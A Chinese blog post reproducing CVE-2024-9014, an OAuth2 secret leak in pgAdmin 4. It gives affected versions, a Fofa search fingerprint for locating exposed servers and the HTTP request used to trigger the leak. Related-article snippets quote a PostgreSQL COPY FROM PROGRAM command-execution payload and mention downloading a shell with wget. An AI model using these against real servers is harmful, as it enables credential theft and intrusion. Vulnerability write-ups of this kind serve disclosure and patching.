pgadmin4敏感信息泄露 CVE-2024-9014

最新推荐文章于 2024-11-08 11:10:24 发布
最新推荐文章于 2024-11-08 11:10:24 发布
阅读量558 收藏 3
点赞数 12
分类专栏: 漏洞复现 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142781057
版权

0x01 产品描述:

        pgAdmin是全球最先进的开源数据库Postgres的领先开源管理工具。 pgAdmin 4旨在满足新手和经验丰富的Postgres用户的需求,提供了强大的图形界面,可简化数据库对象的创建,维护和使用。其可以在Linux,Unix,macOS和Windows上使用,以管理PostgreSQL和EDB Advanced Server 9.5及更高版本

0x02 漏洞描述:

        pgAdmin 8.11 及更早版本存在 OAuth2 身份验证安全漏洞。此漏洞允许攻击者获取客户端 ID 和密钥,从而导致未经授权访问用户数据

0x03 影响版本:

pgAdmin4  8.9-3.fc40

pgAdmin4  8.12-1.fc41

0x04 搜索语句:

Fofa:icon_hash="1502815117"

0x05 漏洞复现:

GET /login?next=/ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27
Connection: close
Accept-Encoding: gzip

0x06 修复建议:

官网已在最新版本修复该问题,请即时修复

Download

iSee857
关注
专栏目录
CVE-2024-3116 PgAdmin8.4代码执行漏洞
A345545108的博客
04-29 1157
在有闲情的时候,看了一下最近的CVE,看到了pgAdmin4在8.4版本之前存在着一个远程代码执行漏洞,因为pgAdmin4在github是开源的,网上也没有看到分析文章,于是就把源码下载了下来,根据漏洞的描述大致的分析了一下代码的触发原因。
CVE-2024-9014 pgAdmin4 OAuth2 client ID与secret敏感信息泄漏漏洞
一个努力学习网安的小牛马
10-08 937
pgAdmin4 是开源数据库 PostgreSQL 的图形管理工具攻击者可构造恶意请求获取客户端ID和密钥,从而导致未经授权访问其他用户数据。本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任。访问路径http://ip/login?
pgAdmin未授权命令执行漏洞(CVE-2022-4223)
蚁景网安学院
06-11 988
首先从代码层面进行分析,接口validate_binary_path​ 最后调用了 subprocess.getoutput(​来执行了命令,这一部分代码是对传入的路径进行检测,如果是在 linux 下直接拼接,在windows 下部署,后缀中会添加 .exe​ 。
API安全产品,面试官都被搞懵了
2401_83974173的博客
04-13 652
这些策略通常会结合使用,以提高产品在市场中的知名度和竞争力。
2024年网络安全最新敏感信息泄露总结_rabbitmq漏洞
2401_84302761的博客
05-01 1568
漏洞原因:Elasticsearch是用Java开发的企业级搜索引擎,默认端口9200,存在未授权访问漏洞时,可被非法操作数据概念:是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。定位:漏洞地址(未经授权访问的):典型命令复现方法:访问manage页面后点击脚本命令行写shell?>’);利用wget命令远程下载shellback.py并不需要root权限。
Apache Apisix网关系统历史漏洞复现分析
道阻且长,行则将至。
02-18 2310
Apache APISIX 作为一个动态、实时、高性能的云原生 API 网关,提供了负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。本文总计、复现可 Apache APISIX 网关系统的几个历史 CVE 漏洞。
2024年渗透测试流程-全(仅供学习,知识分享)_渗透测试教程(1),2024年最新还在等机会
2401_84563080的博客
05-06 1181
openssl心脏出血  https://paper.seebug.org/437/  http://www.anquan.us/static/drops/papers-1381.html  https://www.freebuf.com/sectool/33191.html445/ smb。ladp注入  http://www.4hou.com/technology/9090.html  https://www.freebuf.com/articles/web/149059.html443/ ssl。
红队系列-溯源与应急反制专题
aming小老弟
11-09 547
日志分析、流量特征分析、内存马。
攻防世界-web高手进阶区
zji
04-25 6652
文章目录攻防世界-web高手进阶区一、baby_web二、Training-WWW-Robots1.引入库2.读入数据总结 攻防世界-web高手进阶区 提示:这里是记录web的题目,这里我基本不讲很多细节,请自行下载Burpsuite,web使用的等等工具。 一、baby_web 非常的简单,bp抓包直接把1.php去掉后,就看的flag了。 二、Training-WWW-Robots 非常的简单,点网页进去后,看到了robots.txt进去看到一个可以看到他有一个不允许访问的文件f10g.php,在
红队攻防渗透技术实战流程:红队目标信息收集之基础资产信息收集
HACKONE的博客
03-23 1189
在红队渗透测试中,客户的合作至关重要,他们会提供目标资产的基本信息作为初始攻击面。红队的行动范围通常是由客户明确授权界定的,这其中包括但不限于对主域名、下属子公司以及整个供应链体系中的相关资产进行安全测试。红队需严格按照约定的边界执行任务,可能涵盖但不限于对主域名下的各个子域名进行深度侦查,探究子公司间的网络互联情况,以及深入分析供应链各环节的软硬件设施、业务流程和数据交换点,以全方位评估和模拟真实攻击场景下的安全风险。在执行过程中,红队始终保持专业操守,确保所有行动均在合法、合规的前提下进行,并以增强客户
SRC漏洞挖掘之信息收集
悦分享
07-08 1313
在SRC漏洞挖掘或渗透测试中,信息收集占很大一部分,能收集到别人收集不到的资产,就能挖到别人挖不到的洞。项目已整理Gitbook文档,方便阅览:Information Collection Handbook由此项目整理的SRC资产信息收集聚合网站:lovebear.top/info -- SRC信息收集导航知道目标域名之后,我们要做的第一件事情就是获取域名的注册信息,包括该域名的DNS服务器信息和注册人的联系信息等。Whois 查询Whois 简单来说,就是一个用来查询域名是否已经被注册,以及注册域名的详细
漏洞深度分析|Pgadmin 命令执行漏洞
LJQClqjc的博客
12-16 679
棱镜七彩漏洞深度分析
SQL|用pgAdmin 4一定会遇到的问题解答
qq_41011449的博客
08-15 996
1.建立数据库遇到问题 https://dba.stackexchange.com/questions/149169/binary-path-in-the-pgadmin-preferences 2.如何创建表,以及创建表后不显示。 https://blog.csdn.net/weixin_44493195/article/details/106162814 文章里的刷新按钮在这里: ...
PostgreSQL 高权限命令执行漏洞(CVE-2019-9193)复现
luminous_you的博客
01-05 1776
连接数据库执行命令 DROP TABLE IF EXISTS cmd_exec;//第一次不执行这条 CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'whoami'; SELECT * FROM cmd_exec; 问题:我用的pgadmin连接数据库,在执行这条命令时 COPY cmd_exec FROM PROGRAM 'ipconfig'; 出现了以下错误 ERROR: invalid byte sequen
pgAdmin4的应用(一)
热门推荐
殇莫忆的博客
05-09 10万+
一、安装可供参考:https://blog.csdn.net/qq_28289405/article/details/80240969二、转化为中文可供参考:https://blog.csdn.net/qq_28289405/article/details/80242956三、应用1、创建数据库...
2024年网络安全(黑客技术)三个月自学手册
csbDD的博客
11-06 2041
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全从入门到精通(特别篇IIl):应急响应之病毒蠕虫处置流程
HACKONE的博客
11-06 168
排查 init.d 目录下的脚本文件,如果某个脚本启动的服务进程与名称不符,或者脚本文件的内容被修改,加有别的什么东西启动了别的进程,必须仔细排查,极可能是被用来启动后门进程了。排查C: \、C: \winnt、C: \winnt\System 、C: \winnt\ System32、C: \winnt\System32\dllcache、C: \winnt\System32\ drivers、各个Program Files目录下的内容,排查他们目录及文件的属性,若无版本说明,多为可疑文件;
硬件设备网络安全问题与潜在漏洞分析及渗透测试应用
最新发布
weixin_62512865的博客
11-08 1168
硬件加密绕过漏洞:研究发现,多款流行的SSD存在加密机制绕过漏洞,攻击者可以无需密码 即可绕过硬盘加密措施,获取硬盘中的数据内容。这包括Crucial和Samsung等品牌的SSD产 品,它们尝试实现TCG Opal加密标准,但存在缺陷,允许在不知道任何密钥的情况下完全恢 复数据。固件更新机制漏洞:英睿达MX500系列SSD被曝出存在缓冲区溢出漏洞,攻击者可以精心构 造ATA数据包,通过主机直接发送给SSD控制器,从而触发缓冲区溢出,可能导致数据泄露
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值